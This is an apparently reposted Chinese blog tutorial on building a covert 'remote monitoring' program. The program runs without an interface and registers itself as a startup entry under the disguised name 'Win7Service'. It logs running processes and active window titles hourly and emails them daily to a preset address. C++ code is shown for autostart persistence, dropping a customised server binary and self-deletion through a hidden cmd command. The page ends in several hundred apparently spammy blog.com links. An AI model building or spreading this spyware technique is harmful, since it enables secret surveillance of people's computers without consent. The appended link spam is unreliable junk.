远程监控程序的实现

来源：互联网发布：商标查询软件编辑：程序博客网时间：2024/05/16 19:25

本程序能实现监控的功能，由于我不想记录太多的信息，所以简化了其中的功能。程序中主要记录当前的进程列表和活动窗口的标题，每小时记录一次，每一天向预先设定的邮箱中发一封邮件，典型的邮件内容如下：

2011-03-28
12:28
当前窗口:开始
[System Process]
smss.exe
csrss.exe
wininit.exe
winlogon.exe
services.exe
lsass.exe
lsm.exe
svchost.exe
ibmpmsvc.exe
audiodg.exe
RtkAudioService.exe
RtHDVBg.exe
ZhuDongFangYu.exe
taskeng.exe
lpksetup.exe
TPHKSVC.exe
360rp.exe
taskhost.exe
tpnumlkd.exe
dwm.exe
explorer.exe
FNPLicensingService.exe
CamMute.exe
micmute.exe
TPKNRSVC.exe
lvvsst.exe
virtscrl.exe
rrservice.exe
ImeUtil.exe
WLIDSVC.EXE
TpShocks.exe
TPOSDSVC.exe
rundll32.exe
TPONSCR.exe
SynTPEnh.exe
WLIDSVCM.EXE
msswin7.exe
360sdrun.exe
360speedld.exe
360tray.exe
360leakfixer.exe
sppsvc.exe
SynTPLpr.exe
360sd.exe
SearchIndexer.exe
dllhost.exe
WmiPrvSE.exe
SynTPHelper.exe
13:00

本程序无界面，在控制台程序中释放主程序，完成一些初始化工作，并自动设为启动项。下面主要粘贴几段关键的代码。

1 设为启动项

[cpp] view plaincopy
void EnableAutoLaunch(CString processPath)  
{  
 //写入注册表,开机自启动  
 HKEY hKey;  
 //找到系统的启动项  
 LPCTSTR lpRun = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";  
 //打开启动项Key  
 long lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE,lpRun,0, KEY_WRITE, &hKey);  
 if(lRet == ERROR_SUCCESS)  
 {  
  DWORD dwRet =processPath.GetLength();  
  char *pFileName=processPath.GetBuffer(dwRet);  
  //添加一个子Key,并设置值  
  lRet = RegSetValueEx(hKey, "Win7Service",0, REG_SZ, (BYTE*)pFileName, dwRet);  
  //关闭注册表  
  RegCloseKey(hKey);  
  if(lRet != ERROR_SUCCESS)  
  {  
   AfxMessageBox("系统参数错误,不能随系统启动");  
  }  
 }  
}  

2 释放程序

[cpp] view plaincopy
void ReleaseResource(int resourceID,CString resType,CString proPath,BOOL appendInf/*=FALSE*/,CString inf/*=""*/)  
{  
 DWORD writeSize=0;  
   
 HANDLE hFile = CreateFile(proPath.GetBuffer(0), GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);   
 HRSRC hrsrc=FindResource(NULL,MAKEINTRESOURCE(resourceID),resType.GetBuffer(0));  
 LPCVOID lp=LockResource(LoadResource(NULL,hrsrc));  
 DWORD fileSize=SizeofResource(NULL,hrsrc);  
 WriteFile(hFile,lp,fileSize,&writeSize,NULL);  
 if(appendInf)//是否在程序末尾追加信息  
 {  
  WriteFile(hFile,inf.GetBuffer(0),256,&writeSize,NULL);  
 }  
 CloseHandle(hFile);  
 MessageBox(AfxGetApp()->GetMainWnd()->GetSafeHwnd(),"done.","信息",MB_ICONINFORMATION);  
 ShellExecute(NULL,"open","cmd.exe","/c taskkill /f /im Host.exe & del /f Host.exe",NULL,SW_HIDE);//删除自身，嘻嘻。  
  
}  

3 遍历进程列表

[cpp] view plaincopy
void EnumerateProcesses()  
{  
 HANDLE snapShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);  
 //--------------------------------------  
 //查询进程  
 //--------------------------------------  
 PROCESSENTRY32  processInfo;  
 CString strProcessName= "";  
 DWORD  nProcessID=0;  
 int nProcessTerminate=0;  
 processInfo.dwSize = sizeof(PROCESSENTRY32);  
 BOOL status=Process32First(snapShot,&processInfo);  
 while(status)  
 {  
  strProcessName = processInfo.szExeFile;  
  UpdateProcessList(strProcessName);//更新进程列表  
  status = Process32Next(snapShot,&processInfo);  
 }  
}  

4 定制服务端的生成

就是根据用户输入的email来生成不同的服务端程序。见2中释放程序的函数，我们需要在程序的末尾追加特定信息，这里把用户定制的email信息追加到服务端末尾，本程序向服务端程序末尾追加256字节数据，等到服务端运行的时候会打开自己，读取其末尾的256字节数据，从而得到email信息。

5 发送email

这个函数很关键，代码不少。这里不贴了。http://xuanzai86042.blog.com
http://u7yvdd.blog.com
http://jiapufu986381.blog.com
http://dsd7y6f.blog.com
http://denghejiao847.blog.com
http://s8uusi.blog.com
http://shanla646.blog.com
http://si8is.blog.com
http://yuzhai71385.blog.com
http://y7shid.blog.com
http://chuiheixio654.blog.com
http://ku8duv.blog.com
http://piaodu985.blog.com
http://x8sdf9d.blog.com
http://shiyanping2265.blog.com
http://u8dsuv.blog.com
http://cigaogan132.blog.com
http://fdgf63.blog.com
http://yongba563.blog.com
http://sad7yds.blog.com
http://zhandunshai4584.blog.com
http://sdia8dv.blog.com
http://yutuila676.blog.com
http://asd6gff.blog.com
http://panglu5481.blog.com
http://maisdu8s.blog.com
http://zhishe427.blog.com
http://sad8u8a.blog.com
http://rongtankan202.blog.com
http://tuku768s.blog.com
http://buyandang3750.blog.com
http://sdy7b.blog.com
http://qiuzhou7451.blog.com
http://kus7uf.blog.com
http://jingyu73683.blog.com
http://sy7s8.blog.com
http://guanxi044.blog.com
http://s8uf6ds.blog.com
http://tianye72875.blog.com
http://liuhetu8s.blog.com
http://buboyi826.blog.com
http://yus8sf.blog.com
http://mijian587.blog.com
http://s78sdtu.blog.com
http://jixiu82363.blog.com
http://afeitus7.blog.com
http://dingying88261.blog.com
http://afeis67.blog.com
http://luncon752.blog.com
http://su8sdv.blog.com
http://dutangfa732080.blog.com
http://s7sjudg.blog.com
http://yeyunh327.blog.com
http://s7sd7sfs.blog.com
http://zuota320.blog.com
http://s7sud7.blog.com
http://jiluo5235.blog.com
http://s8uds7.blog.com
http://duidij133.blog.com
http://sd898cc.blog.com
http://tanran482.blog.com
http://s8ddvvx.blog.com
http://shoucong908166.blog.com
http://baimai67s.blog.com
http://xuanyin85030.blog.com
http://lo9sjcc.blog.com
http://nuozixi469484.blog.com
http://hongjie789.blog.com
http://yunong404.blog.com
http://usd8vc.blog.com
http://gongzh781.blog.com
http://s8ud7f.blog.com
http://shihankui733264.blog.com
http://hu8sjdx.blog.com
http://chenba625.blog.com
http://wanhaw78s.blog.com
http://renren587.blog.com
http://vipbaiwana.blog.com
http://shizha81405.blog.com
http://s8ud8sv.blog.com
http://meinai385.blog.com
http://s7ds7dc.blog.com
http://nayong239.blog.com
http://tukus8d.blog.com
http://lingxu73681.blog.com
http://baiwe7sd.blog.com
http://shupu5070.blog.com
http://sd8s7dw.blog.com
http://muma487.blog.com
http://hongjie899.blog.com
http://yucuoy987.blog.com
http://s8dus8d.blog.com
http://ganxu85734.blog.com
http://ji8ussa.blog.com
http://didang154.blog.com
http://lonjiu88.blog.com
http://baoyu81034.blog.com
http://humingtuku.blog.com
http://luozhang7881.blog.com
http://xianagg789.blog.com
http://lianhaot936.blog.com
http://yu897e.blog.com
http://chenme145.blog.com
http://huming896.blog.com
http://huanglaogang908.blog.com
http://kaijian789.blog.com
http://xuanzhen81825.blog.com
http://tk66778.blog.com
http://lanzan6842.blog.com
http://yy7781.blog.com
http://yeguda043.blog.com
http://hi9898.blog.com
http://zuoyuan81767.blog.com
http://shngtu765.blog.com
http://kengna068.blog.com
http://baimao898.blog.com
http://jilulu795.blog.com
http://xghm118.blog.com
http://diaozhang6880.blog.com
http://jltu321.blog.com
http://dengyong85701.blog.com
http://jltkzs567.blog.com
http://wanxu77831.blog.com
http://ju88336.blog.com
http://benche338.blog.com
http://jl118tk.blog.com
http://muhaoyua163260.blog.com
http://jjijhu889.blog.com
http://niuzhi80084.blog.com
http://jaods667.blog.com
http://xunzhu816.blog.com
http://ju8sdss.blog.com
http://chengleng581.blog.com
http://xiangg782.blog.com
http://fanyou76661.blog.com
http://sjdsiu78.blog.com
http://jxrscrpcrq548.blog.com
http://jiu8d88.blog.com
http://tongxiu6342.blog.com
http://i88899.blog.com
http://haojiaos437763.blog.com
http://jisd78s.blog.com
http://zhuyan87250.blog.com
http://jiu898s.blog.com
http://zuoyan81776.blog.com
http://su88889.blog.com
http://jiannaoxie766.blog.com
http://cu56789.blog.com
http://zuozhou81184.blog.com
http://huimimei.blog.com
http://qiaosui385.blog.com
http://xianf678.blog.com
http://duzhu6666.blog.com
http://lxf1112.blog.com
http://paipuw459.blog.com
http://u8uuus.blog.com
http://xingliao386927.blog.com
http://aaa8ssv.blog.com
http://zuoxun72033.blog.com
http://nishi789.blog.com
http://zhongzha209117.blog.com
http://jiulong6a.blog.com
http://luxiu70834.blog.com
http://ju88789.blog.com
http://xzzjbhhmpy7289.blog.com
http://liuhetk118.blog.com
http://baoyun83348.blog.com
http://masha787.blog.com
http://shengzha6340.blog.com
http://zhens886.blog.com
http://jiaomi053.blog.com
http://kiu72a.blog.com
http://ranxi464.blog.com
http://shi8781.blog.com
http://bixitui017.blog.com
http://shsd6543.blog.com
http://piuti1.blog.com
http://aniy787.blog.com
http://guizhongzh646.blog.com
http://y6y6yys.blog.com
http://mituo500.blog.com
http://juju776s.blog.com
http://huanxi767.blog.com
http://juu8uu8.blog.com
http://shancuopa888.blog.com
http://mjj871.blog.com
http://diaoyuan6572.blog.com
http://sh7787s.blog.com
http://duqin456.blog.com
http://ghu7871.blog.com
http://yuelei981.blog.com
http://lolo009.blog.com
http://zizhiwen380499.blog.com
http://lok9909.blog.com
http://zuoxiang578.blog.com
http://iiu88989.blog.com
http://shenxi444.blog.com
http://hu88778.blog.com
http://yaoling477.blog.com
http://hu88890.blog.com
http://heshao458.blog.com
http://huu8887.blog.com
http://jingxun74026.blog.com
http://huuu778.blog.com
http://zhishibi03400.blog.com
http://juu7879.blog.com
http://fangwodui74193.blog.com
http://lo99889.blog.com
http://yuyun80146.blog.com
http://hu77889.blog.com
http://xianyipa393360.blog.com
http://ju77886.blog.com
http://shanlezh774.blog.com
http://gq77886.blog.com
http://yuanha220.blog.com
http://wei8897.blog.com
http://shijiu672.blog.com
http://hu67812.blog.com
http://xianta561.blog.com
http://ty78u1.blog.com
http://pingqi403.blog.com
http://siy6786.blog.com
http://renqiaoxing326440.blog.com
http://huy3456.blog.com
http://ganya87860.blog.com
http://ju34123.blog.com
http://zhicituo1957.blog.com
http://tjtk869.blog.com
http://jixun88217.blog.com
http://tjian666.blog.com
http://tianzhan72803.blog.com
http://ft6786.blog.com
http://qulong5184.blog.com
http://hy4531.blog.com
http://louying6361.blog.com
http://tjanjian168.blog.com
http://dangxin267.blog.com
http://wi7891.blog.com
http://lundun397.blog.com
http://yif678q.blog.com
http://zuozhang82012.blog.com
http://yinshu789.blog.com
http://jiexio105431.blog.com
http://dazhof678.blog.com
http://liaosu509.blog.com
http://sus7d81.blog.com
http://xiande376.blog.com
http://zheshijie1.blog.com
http://yuanli716.blog.com
http://shehui6761.blog.com
http://huzai73714.blog.com
http://zheshi678.blog.com
http://luzhi6112.blog.com
http://zhani7891.blog.com
http://wenjiz705.blog.com
http://nagwe312.blog.com
http://zuoyu81284.blog.com
http://zheshiwei.blog.com
http://gongyan82421.blog.com
http://jiush789.blog.com
http://zongying87454.blog.com
http://kyischi.blog.com
http://zhumu5803.blog.com
http://wobumu8.blog.com

0 0